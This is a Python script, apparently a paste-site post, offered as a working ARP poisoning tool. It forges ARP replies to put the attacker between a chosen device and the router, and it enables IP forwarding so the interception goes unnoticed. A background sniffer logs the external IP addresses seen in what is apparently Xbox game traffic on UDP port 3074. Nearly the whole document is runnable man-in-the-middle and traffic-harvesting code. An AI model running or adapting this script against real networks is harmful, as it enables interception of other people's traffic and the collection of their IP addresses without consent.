Cain and Abel ARP Poisoning Tool

1. #ONLY WORKS ON LINUX!!!
2. #Cain and Abel ARP Poisoning for Linux
3. #Can be used to perform MITM with right data filtering
4. #Basic ARP Poisoning/Spoofing
5.  
6. #By K-Metal
7. from scapy.all import *
8. import time
9. import socket, sys
10. from struct import *
11. import threading
12. from subprocess import Popen, PIPE
13. import os
14.  
15. #Restore ARP
16. def Restore(vm, rm, vi ,ri):
17.  
18.     #disable IP Fowarding to return to normal
19.     with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipz:
20.             ipz.write('0\n')
21.  
22.     #Reset ARP with router and device
23.     send(ARP(op=2, pdst=ri, psrc=vi, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=vm),verbose=0,count=3)
24.     send(ARP(op=2, pdst=vi, psrc=ri, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=rm),verbose=0,count=3)
25.  
26.     #Quit program
27.     sys.exit("\nchose to stop")
28.  
29. #Get Device Mac address
30. def GetMac(host):
31.     pid = Popen(["arp", "-n", host], stdout=PIPE)
32.     s = pid.communicate()[0]
33.     a = s.split(" ")
34.     b = ""
35.     for line in a:
36.         b += line
37.     print str(b)
38.     MacAddr1 = (b.split("ether")[1]).split('eth0')[0]
39.     Addr = ""
40.     for liner in MacAddr1:
41.         if liner == "C":
42.             pass
43.         else:
44.             Addr += liner
45.     return str(Addr)
46.  
47. # Main Thread
48. def ARP_Poison():
49.     vip = raw_input("Enter device ip: ")
50.     rip = raw_input("Enter router ip: ")
51.  
52.     #Personal settings for my setup (change 4 yours)
53.     if vip == "xbox":
54.         vmac = "00:25:ae:18:99:de"
55.         vip = "10.0.0.3"
56.     else:
57.         vmac = GetMac(vip)
58.     rmac = GetMac(rip)
59.  
60.     #Enable ip foward so device sniffing doesn't get kicked off
61.     with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
62.             ipf.write('1\n')
63.  
64.     # ARP Spoof
65.     def poison(vm, rm, vi, ri):
66.         send(ARP(op=2, pdst=vi, psrc=ri, hwdst=vm),verbose=0)
67.         send(ARP(op=2, pdst=ri, psrc=vi, hwdst=rm),verbose=0)
68.  
69.     print "Poisoning"
70.    
71.     # Keep Spoofing or stop.
72.     while True:
73.         try:
74.             try:
75.                 poison(vmac,rmac,vip,rip)
76.             except KeyboardInterrupt:
77.                 Restore(vmac,rmac,vip,rip)
78.                 break
79.             try:
80.                 time.sleep(2)
81.             except KeyboardInterrupt:
82.                 Restore(vmac,rmac,vip,rip)
83.                 break
84.            
85.         except KeyboardInterrupt:
86.             Restore(vmac,rmac,vip,rip)
87.             break
88.  
89. #Personal Setting to listen for xbox IP's
90. def Listener():
91.     msg = ""
92.     ip_list = []
93.  
94.     #Parse the packet to save IPs to file
95.     def Parse(packet):
96.         try:
97.             ip1 = str(packet[0][1].src)
98.             ip2 = str(packet[0][1].dst)
99.             if ip1 not in ip_list:
100.                 try:
101.                     #Filter for needless IP's, you can add more if needed
102.                     if ":" not in ip1:
103.                         if ip1 == "0.0.0.0":
104.                             pass
105.                         elif "255" in ip1:
106.                             pass
107.                         elif "10.0.0." in ip1:
108.                             pass
109.                         elif ip1 == "224.0.0.252":
110.                             pass
111.                         elif "65.5" in ip1:
112.                             pass
113.                         elif "184.29.104" in ip1:
114.                             pass
115.                         elif "75.75" in ip1:
116.                             pass
117.                         elif "127.0" in ip1:
118.                             pass
119.                         else:
120.                             ip_list.append(ip1)
121.                 except:
122.                     pass
123.             if ip2 not in ip_list:
124.                 try:
125.                     if ":" not in ip2:
126.                         if ip2 == "0.0.0.0":
127.                             pass
128.                         elif "255" in ip2:
129.                             pass
130.                         elif "10.0.0." in ip2:
131.                             pass
132.                         elif ip2 == "224.0.0.252":
133.                             pass
134.                         elif "65.5" in ip2:
135.                             pass
136.                         elif "184.29.104" in ip2:
137.                             pass
138.                         elif "75.75" in ip2:
139.                             pass
140.                         elif "127.0" in ip2:
141.                             pass
142.                         else:
143.                             ip_list.append(ip2)
144.                 except:
145.                     pass
146.             msg = ""
147.             for addr in ip_list:
148.                 msg += addr +"\n"
149.  
150.             #Save to log file
151.             print "Saved to log.txt"
152.             newfile = open("log.txt","w")
153.             newfile.write(msg)
154.             newfile.close()
155.         except:
156.             pass
157.     while True:
158.         #You can change the protocol and port to sniff on
159.         device = sniff(filter="udp and port 3074",prn=Parse,count=1)
160.  
161. #Start the listening thread and the ARP Spoofing Thread
162. t = threading.Thread(target=Listener)
163. t.daemon = True
164. t.start()
165. ARP_Poison()